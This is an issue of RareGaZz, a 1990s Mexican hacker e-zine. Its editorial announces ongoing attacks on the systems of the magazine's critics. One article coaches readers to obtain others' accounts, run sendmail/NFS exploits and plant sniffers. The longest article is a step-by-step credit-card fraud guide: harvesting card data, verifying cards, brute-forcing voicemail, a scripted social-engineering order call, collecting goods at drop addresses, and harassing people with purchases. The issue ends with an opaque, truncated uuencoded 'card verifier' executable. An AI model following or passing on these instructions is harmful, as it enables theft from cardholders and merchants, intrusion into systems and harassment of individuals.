
                       3l GrUp0 r3v0lUC10Nar10s d3l Ka0s
                                   pr3S3NTa

                               <<::RareGaZz::>>
                           "El Abogado del Diablo"

                               Ao 1,  numero 4

                              -0- Comandantes -0-
                    KillerBot - LePompeItor - Mr.X - RareTrip
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    Contenidos

           1.- Introduccion -RareTrip-
           2.- Como convertirse en un Hacker de Unix -LePompeItor-
           3.- Vamonos de compras por la red (sin gastar un peso) -Mr.X-
           4.- Como cubrir tus huellas Parte 1/2 -CrackSmoker-
           5.- Poison Java -Mr. X-
           6.- Algunos Bugs de SendMail -Psycho Tranze-
           7.- Esteganografia, una vista a fondo. -KillerBot-
           8.- El padre de todos los virus Parte 1 de 2 -internet-
           9.- Es Windows un Virus? -internet-
          10.- Los vendedores y el anacoreta -colaboracion anonima-
          11.- Phreaking para principiantes -sir francis drake-
          12.- Editorial de Phrack -Reimpresion por RareGaZz-
          13.- L3TZ HACK! -RdK-
          14.- Ctrl + Alt + Del -RareGaZz-

       "Tu no sabrias que hacer con un passwd sin tokens..." Hector Lecuanda
       Yeah, right.

 RareGaZz es escrito con muchas ganas de informar y nadie se hace responsable
 de lo que la  informacion/comentarios/sugerencias y todo lo contenido en los
 bytes  de  este E-Mag ocasionen a sistemas o individuos.  Por  favor  tengan
 cuidado y *USEN* su cerebro antes de hacer lo que  aqui se sugiere. En  fin,
 no dejen que esto los detenga y adelante...iluminen su conocimiento!

 Si deseas contactar a las personas encargadas de esta revista escribe a:

                               RAREGAZZ@BIGFOOT.COM
                              RAREGAZZ@GEOCITIES.COM

 Los mensajes que envies pueden estar encriptados con la siguiente llave PGP

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzGPVwcAAAEEALETqAwBh9Esqcm7qrIFD0mtwe1l/bO6YcGmB33GwJQ5h97P
AmA/QfBUU8Jo5kQI95444XkDdP4TVE5O6kiGE22lpxJ07R2bdB7qe9uCK51jOxzs
ZS+7hm6GjPleeD/CqD7ktoc6bCYAkN5CxMARq6yb1B1bBE9QVz+6lY+Qf9UtAAUR
tB9SYXJlR2FaeiA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=Domc
-----END PGP PUBLIC KEY BLOCK-----
 
          RareGaZz, una revista creada por Hackers para los Hackers.
       (WareZ D00dZ, CrackerZ, WannaBe'S, SysAdmins, & PsychoS Welcome)

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


                               * INTRODUCCION *
                                 ~~~~~~~~~~~~
 RareGaZz, una revista dedicada a el esparcimiento de la cultura cibernetica
 especialmente la que se ha creado mediante la fusion de formas de pensar
 originalmente mexicanas y aquellas que han sido impuestas por internet, casi
 sin darnos cuenta. Nosotros tratamos de que no nos olvidemos de la
 importancia de permanecer unidos los mexicanos en esta red donde no se
 conocen fronteras y no existen las ideologias nacionalistas que ha ningun
 individuo sirven, son pues, para las masas.

 Cuando empezamos con la idea de la revista nunca nos imaginamos las
 respuestas tan negativas de las compaias comerciales e instituciones
 educativas de Mexico respecto a esta publicacion. En vez de ayudar a la
 revista para que se enfoque en ayudar a cualquier interesado en la
 informatica y tecnologia de redes, se han afanado en descubrir la identidad
 de nosotros los creadores para demandarnos y hacernos 'pagar' por los daos
 que segun ellos esta revista les ocasiona. Pues bien, con todo el respeto
 que se merecen todas las organizaciones que buscan sacarnos de la red, les
 enviamos el mas respetuoso CHINGEN A SU MADRE! RareGaZz esta en internet
 ahora y lo estara SIEMPRE.

 Nuestras direcciones de correo se han visto virtualmente inundadas por correo
 con insultos y amenazas de distintos grupos mexicanos en i-net que desean la
 desaparicion de esta revista y por poco lo logran. No se como le hicieron
 pero me localizaron a mi (raretrip) y me destruyeron toda la informacion en
 mi computadora amenazandome con estupidas demandas y penas inexistentes. Pero
 en fin, cuando me encontraba ausente del lugar donde se encuentra mi Pc,
 entraron amenazando a todo mundo y formatearon mi disco duro. Gran error >:-}

 Despues de este incidente me puse a investigar si en realidad podrian tomarse
 acciones legales en mi contra o contra mis compaeros y encontre algo muy
 curioso en un libro llamado 'Constitucion de los Estados...blah' que se
 refiere a la "LIBERTAD DE CUALQUIER CIUDADANO PARA EXPRESAR SUS PUNTOS DE
 VISTA" y de ahi pienso agarrarme para defender la publicacion de esta revista
 y tal vez, proximamente, registrarla como publicacion oficial -Claro que
 seguira siendo gratuita-.

 La violencia genera violencia, ellos empezaron y por eso desde el tercer
 numero nos toca a nosotros. RareGaZz ahora forma parte permanente del grupo
 RdK que significa 'Revolucionarios del KaoS' que paso a formar el grupo Elite
 de Contra-Ataque a cualquier persona, grupo o institucion que intente por
 cualquier via terminar con esta revista. RareGaZz y el grupo RdK se
 comprometen a defender nuestras ideas usando todas las herramientas que nos
 pueda ofrecer la informatica que es, y sera, nuestra permanente aliada.

 Si las personas que nos han estado molestando (ellos saben quienes son)
 desean terminar este asunto como seres pensantes que -creo- son, estamos
 dispuestos a llegar a un acuerdo con ustedes. Ahora que, sigan molestando a
 los integrantes de nuestra lista de correo haciendose pasar por alguno de
 nosotros para luego formatearles sus pc's para culparnos, sigan bombardeando
 nuestras direcciones de correo, continuen amenazandonos, y  sus sistemas
 seguiran pagando las consecuencias. Desde el numero anterior hemos empezado a
 atacar varios sistemas que nos han tratado de joder y solo terminaremos
 cuando todos lleguemos a un acuerdo, de lo contrario seguiremos en pie de
 guerra como hasta el momento.
 RareTrip - Editor

                               <<::RareGaZz::>>
                       "Por la Libertad de Informacion"
                                   raretrip
                                   killerbot
                                  lepompeitor
                                     Mr.X

                                   -= RdK =-
                  "Preparados para la Guerra y el Terrorismo"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

               ################################################
               #                                              #
               #    COMO CONVERTIRSE EN UN HACKER DE UNIX     #
               #                                              #
               ################################################

                                  LePompeItor

 Asi que has decidido convertirte en un hacker del sistema unix pero no sabes
 como empezar? Antes de leer te deben quedar claras las siguientes cosas:

 1) Ser hacker es mucho trabajo. No es una forma de jugar para nios que solo
    le dediquen 15 minutos. Debes aprender a operar y programar un sistema.
    Debes investigar como ejecutan el codigo fuente de los scripts.
    Es un largo camino asi que estas avisado.

 2) Ser hacker es ilegal. Por lo menos en la mayoria de los paises existen
    leyes creadas para los hackers. Argentina e Irlanda no tienen leyes para
    perseguir un hacker. Confia en que si saben quien eres, vendran por ti.

 3) Hackear consume tiempo. No puedes ser hacker la mitad de un ao, despues
    hacer una pausa de 3 meses y regresar.
    El tiempo corre rapido en Internet. Nuevas versiones unix, nuevos bugs
    y nuevas curas. Cuando tu exploit pase de moda deberas rogar por
    conseguir la informacion mas nueva, y si eso pasa ellos nos estaran muy
    felices por eso.

 50% del tiempo de un hacker se expende en recopilacion de informacion.
 Hablar con otros hackers, leer listas de correo y grupos de noticias, ver
 buenos sitios www y ftp.

 Pero cual es la motivacion para ser BUEN hacker de unix?
 Eso depende de ti. Si quieres convertirte en uno piensa en POR QUE quieres
 ser hacker.
 Olvida peliculas como "The Net" o "Hackers" - Eso no es la realidad!
 Olvida sueos como ser el heroe, hackear computadoras de gobierno y
 convertirte en el hombre mas sexi, tener mujeres y terminar con un salario
 COOL y trabajando en la seguridad de los sistemas ;-) Esto no pasara - asi
 que asegurate bien del POR QUE quieres ser un hacker.

                              -= COMO EMPEZAR =-

 -. Familiarisate
    Como podrias ir a un rodeo sin saber manejar a un caballo?

 -. Consiguete una distribucion de unix
    Consigue Linux, FreeBSD, Solaris, Sinix etc. para tu computadora personal.
    Linux y FreeBSD son baratos (o gratuitos) y son derivadas deBSD, mientras
    que Solaris y Sinix son caros y derivados de Sys V.
    La distribucion linux que debes elegir es aquella con un buen libro de
    instrucciones. Debes aprender a operar unix.
    Primero aprende lo basico, como cambiar directorios, copiar y borrar, y
    usar el editor.

 -. Motivate a USAR unix.
    Como hacer eso - depende de ti.

 -. Busca libros para que te ayuden.

 -. Necesitaras una conexion a internet con PPP y/o acceso shell.
    Nunca hagas hacking o intercambies informacion no encriptada con PGP con
    esta cuenta tuya.
    Trata de configurar tu UNIX pc para usarla con tu cuenta. Algunas buenas
    distribuciones de Linux tienen un buen libro para explicar como hacer
    esto.

 -= Aprende lo Basico =-

 -. Trata de tener toda la informacion y archivos que puedas conseguir en
    internet (i-net).
    Examina www, ftp y usa maquinas de busqueda.
    Subscribete a importantes listas de seguridad. Asiste a buenos lugares
    irc.

    Aqui esta algo para empezar:

            http://underground.org
            ftp://onyx.infonexus.com
            nntp://comp.security.*

             Lista de correo Bugtrac ->
                     email : listserv@netspace.org
        Cuerpo del mensaje : subscribe bugtraq nombre


 -. Lee y analiza tu informacion no solo la colecciones.

 -. Consigue una cuenta que no sea tuya - intenta obtenerla de algun hacker
    que hayas conocido.

 -. Con esta cuenta puedes intentar hackear tu primer sistema. Prueba tus
    exploits etc.

 -. Usa exploits ypx, sendmail, NFS inseguros, para tener mas hosts.

 -. Instala un sniffer si es posible en el sistema que hayas hackeado root.
    Esto te dara muchas cuentas en otros hosts.

 -. Usa tus scripts exploits.

                         -= Conviertete en Hacker =-

 Que! - ya has hackeado root en algunos sistemas - y aun no eres un hacker -
 POR QUE? Un hacker no es solo alguien que entra a un site, instala un
 sniffer y sigue. Un verdadero hacker es alguien que hackea para comprender
 un sistema, conocer como reacciona e inventar nuevas herramientas.
 He aqui un Colon del Cyberespacio.

 Consigue ponerte en contacto con otros hackers y cambia informacion,
 experiencias, cuentas, exploits y archivos.

 -. Ve las discusiones de los grupos de noticias, listas de correo e irc.
    Trata de leer algunos importantes RFCs, aprende C y comienza a
    programar herramientas propias.

 -. No te conviertas en "3l337" - Tu sabes que eres cool y no necesitas
    convencer a nadie de eso. Comportante normalmente y ayuda a otros que
    te pregunten "Como hackeo un Unix?"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]
 
            XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
            XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
              \\\\\     /////  /////  //////////// /////\\\\
               \\\\\   /////  /////  /////        /////  \\\\\
                \\\\\ /////  /////  ///////////  \\\\\\\\\\\\\\
                 \\\\\///   /////        /////  \\\\\\\\\\\\\\\\
                  \\\\\/   ///// ////////////  /////        \\\\\
            XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
            XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                        VAMONOS DE COMPRAS POR LA RED!
                         -sin gastar un peso...claro.-

                                Para: RareGaZz
                                  Por: Mr. X

                "Me gusta, me lo llevo, carguelo a SU cuenta"

 [ Nota: El siguiente texto tiene fines EDUCATIVOS solamente y RareGaZz no se
  hace responsable por cualquier persona que intente hacer lo aqui descrito.]

 1. Introduccion.
 ~~~~~~~~~~~~~~~~
 Siempre que alguien quiere nuevo hardware o algun juguete y desea tenerlo
 gratis viene a mi y me pregunta:
                     Como obtengo cosas gratis de la red?
 En este texto voy a tratar de explicarle a las personas que tengan esa
 pregunta como hacerlo facilmente y eliminando el riesgo de caer atrapado por
 la ley. La finalidad de este articulo es llevarte paso a paso en el proceso
 de usar las tarjetas para hacer compras hasta el momento en que estes en casa
 leyendo el manual de tu nuevo juguete.

 2. Obtener la informacion de las tarjetas
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Conseguir la informacion es el mas facil de los pasos para hacer esto.
 Simplemente podrias recoger algunas bolsas de basura en tu restaurante local,
 tienda de curiosidades o banco para encontrar los papeles carbon que se usan
 para pasar la info de las tarjetas a las diferentes hojitas cuando es pasada
 por la maquina registradora.

 No importa COMO obtengas la informacion, pero debes asegurarte de conseguir
 el nombre entero de la persona, su numero de tarjeta completo, la fecha de
 expiracion, y con suerte una direccion. En el caso de solo tener el nombre
 de la persona revisa en directorios o usando COMPUSERVE busca su direccion.
 Si tambien puedes conseguir el nombre del banco que creo la tarjeta ayudaria
 mucho.

 3. Verificar la informacion de la tarjeta.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Hay muchas formas de hacer esto. Y recuerda que mientras haces esto seria
 MUY util obtener su credito disponible.

 1> Si sabes que banco saco la tarjeta, llama al banco y pregunta por el
 servicio de credito automatico. La mayoria los tienen. Este servicio fue
 creado para que los dueos de las tarjetas verifiquen su credito, balance,
 etc. Usualmente tienen ALGUN tipo de seguridad que previene a cualquier
 persona obtener esa informacion. Esta seguridad es inutil. Necesitarias
 saberte los ultimos 4 digitos de su registro social o su codigo postal.

 2> Has una compra pequea a cualquier direccion solo para verificar que
 aceptan la informacion de la tarjeta.

 3> Usa un servicio pornografico que acepte tarjetas de credito.

 4> Compila el programa incluido al final de este articulo UUENCODE que sirve
 unicamente para verificar si el numero de tarjeta es valido y saber de que
 tipo de tarjeta se trata.

 4. Buscar la tienda o negocio a donde iras de compras.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Debes buscar una compaia relativamente pequea - una que tenga lo que
 necesites en bodega pero no una que necesite empleados especiales para
 contestar llamadas. La mayoria de los lugares (Elektra, Radio Shack, etc.)
 te enviaran lo que pidas a cualquier direccion de la republica. Yo te
 recomiendo que uses un servicio de compras por Telefono que pueda entregarte
 tu pedido al dia siguiente a mas tardar. Tambien debes asegurarte que
 acepten el tipo de tarjeta con el que piensas pagar, para aquellos muy
 nuevos en esto aqui esta una breve descripcion:

    Si el primer digito de la tarjeta es:

                    3 American Express (15 digitos)
                    4 Visa             (13 o 16 digitos)
                    5 Mastercard       (16 digitos)
                    6 Discover         (16 digitos)

 5. Hacer la llamada.
 ~~~~~~~~~~~~~~~~~~~~
 Antes de ir mas adelante, asegurense de tener un numero donde puedan
 verificar la orden. Puedes usar esos buzones de voz que ofrecen las compaias
 telefonicas pero obviamente alguno que hayas hackeado.
 Para hackear los buzones de voz necesitas un programa llamados VMS HACKER que
 permiten marcar un numero e intentar cualquier combinacion de digitos hasta
 descubrir la clave del buzon.
 Cuando hagas el pedido di que hablas de un negocio por que las tiendas
 siempre tratan mejor a un negocio que a un cliente estandard. Diles que
 necesitas los productos al siguiente dia, y si no pueden hacer esto, busca
 otra compaia.
 Cuando hagas la llamada relajate, pretende que estuvieras haciendo una orden
 para ti mismo, nada fuera de lo ordinario, pero tu necesitas empezar con este
 proyecto temprano. Asegurate que tengas toda la informacion a tu alcance.
 Llama durante horas de oficina y *NO* en viernes, sabado o domingo.
 Esta es una llamda ejemplo:

   Cia-"Hola XXXX, este es mark puedo ayudarlo?" (Apunta su nombre)
Hacker-"Si, mi nombre es Mr.X y estoy llamando del D.F., quisiera hacer un
        pedido."

   Cia-"Ok. Permitame ayudarlo, Puedo saber su nombre?
Hacker-"Mr.X"

   Cia-"Su direccion, Mr.X"
Hacker-"Avenida XXXXX XXXXXXX, esta en XXXXXXX, el codigo postal es XXX"

   Cia-"Ok. me podria dar un numero para localizarlo en caso de problemas."
Hacker-"XXX-XXX-XXX"

   Cia-"Que desea ordenar?"
Hacker-"Necesito cuatro de esas impresoras laser jet, creo que ya hable con
        alguien el viernes acerca de esas, el numero de parte es XXXXXX-XX.
        Tambien, tengo una pregunta en esas impresoras, que tipo de garantia
        tienen?" (Siempre pregunta por garantia!)

   Cia-"Bueno seor, esos modelos en particular tienen un ao de garantia.
       Puede usted comprar una garantia adicional de 5 aos por solo $XX
       adicionales por pieza. Tenemos una garantia incondicional de 90 dias."
Hacker-"Tomare la garantia de 5 aos en todas las impresoras."

   Cia-"Necesita algun cartucho de toner o papel?"
Hacker-"No, todo lo que necesito son las impresoras."

   Cia-"Como desea que las envien?"
Hacker-"Tienen servicio de paqueteria urgente no?

   Cia-"Si."
Hacker-"Entonces envienmelas para maana."

   Cia-"Y como va a pagar su orden?"
Hacker-"Con nuestra tarjeta corporativa Bancomer."

   Cia-"Puedo tener el numero de cuenta?
Hacker-"seguro, es el XXXXX-XXXXX-XXXXXX"

   Cia-"El paquete debe llegar a la direccion de la tarjeta?

 - Aqui tienes dos opciones, decir que no y arriesgarte un poco dando otra
   direccion o luego llamar a el servicio de paqueteria para que cambien la
   ruta del paquete.

Hacker1-"No, por favor haganmelas llevar a la Ave. XX.XXX-X-X-X-X"
Hacker2-"Si asi es."

   Cia-"Entonces el paquete saldra hoy mismo y lo tendra usted maana
        temprano."
Hacker-"Gracias..."

 Quisiera mencionar algunas cosas. Primero, trata de determinar que tipo
 de autorizacion de tarjetas tienen. Si es una tienda, probablemente usen
 las terminales ZION, el tipo estandard o de barrido. Estas terminales no
 verifican la direccion o alguna otra cosa, solo se aseguran que la tarjeta
 sea valida y tenga el suficiente credito. El otro tipo de verificacion
 obtiene toda la informacion, incluyendo nombre y direccion. Es por eso que
 resulta importante que envies el pedido a la direccion de la tarjeta, ya que
 si cambias la direccion destino pueden llegar a sospechar.
 Trata de ser lo mas complaciente posible por que en el caso de que la tarjeta
 no pase la verificacion necesitaras otra que debes tener disponible.

 6. Encontrar el lugar donde dejaran el producto.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Esto es una de las cosas mas dificiles de hacer.Deberas encontrar un edificio
 de departamentos cercano (no mucho) de donde vives. O busca una casa con el
 signo de 'SE VENDE' en el patio.
 Cualquiera de los casos, encuentra un lugar donde puedas esperar la camioneta
 con el pedido y estar atento.

 7. Recoger el paquete.
 ~~~~~~~~~~~~~~~~~~~~~~
 Esta es la parte mas PELIGROSA del asunto. Si vas a ser arrestado, aqui es
 donde pasara. NO hagas que alguien lo recoja por ti, dios sabe que
 inmediatamente te delatarian. Sin mencionar que eres probablemente mas
 brillante que la tipica planta casera, asi que quizas puedas con un buen
 choro [ verbo ] salir de la situacion. Algo asi funciona bien "Un tipo en
 la calle me dio este billete de $50 pesos por hacerlo, esta ahi...Que???
 hace rato estaba ahi en la esquina! Donde habra ido?

 Llega al sitio donde recogeras el paquete muy temprano y camina por ahi,
 relajate, busca rutas de escape y tambien el camino que la panel seguira
 antes de llegar al lugar. Ponte atento si vez algo anormal.

 Cuando veas que el camion con el paquete va llegando, pretende como si
 estuvieras haciendo jardineria (si es una casa) o como si fueras saliendo o
 entrando del departamento. Firma el recibo y listo!

                              Posibles Problemas
                              ~~~~~~~~~~~~~~~~~~
 Los unicos problemas que pueden ocasionar que el paquete no llegue son los
 siguientes: A> No hay suficiente credito B> Llamaron al dueo de la tarjeta
 para verificar el pedido.

 Recuerda no usar mas de 2 veces el mismo lugar para recoger el paquete,
 nunca usar una compaia mas de una vez y nunca usar la misma tarjeta 2
 veces.

 Cuando tengas tu paquete MANTEN TU BOCA CERRADA. No brinques a IRC, y digas
 "Hey Cameron, acabo de comprar con tarjeta (carding) una Pentium." Y si lo
 haces no digas ESPECIFICACIONES, no deZ informacion acerca de la compaia,
 el sitio donde recogiste el paquete, el nombre en la tarjeta, NADA.

                             -=KAOZ ALTERNATIVO=-
                               ~~~~~~~~~~~~~~~~
 En ocasiones tendras mucha informacion sobre distintas tarjetas pero no eres
 lo suficientemente valiente para comprar algo para ti asi que decides
 subscribir a magazines de gays/bisexuales/homosexuales a un enemigo tuyo.
 Buena Idea! Tambien puedes ir a una tienda de articulos para el sexo y
 comprar un GRAN masturbador y enviarselo a una compaera de la escuela para
 ganar algunas risas :-)  Recuerda, NO DIGAS A NADIE QUE TU LO HICISTE!

                 * Verificador de Tarjetas de Credito Validas *
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 Copia el texto ENTRE los puntos a un archivo llamado CARD.UUE y ejecuta el
 siguiente comando:
                              uudecode card.uue
  Necesitaras el programa uudecode incluido en el primer numero de RareGaZz

...............................Corta entre los puntos.........................
begin 644 card.exe
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
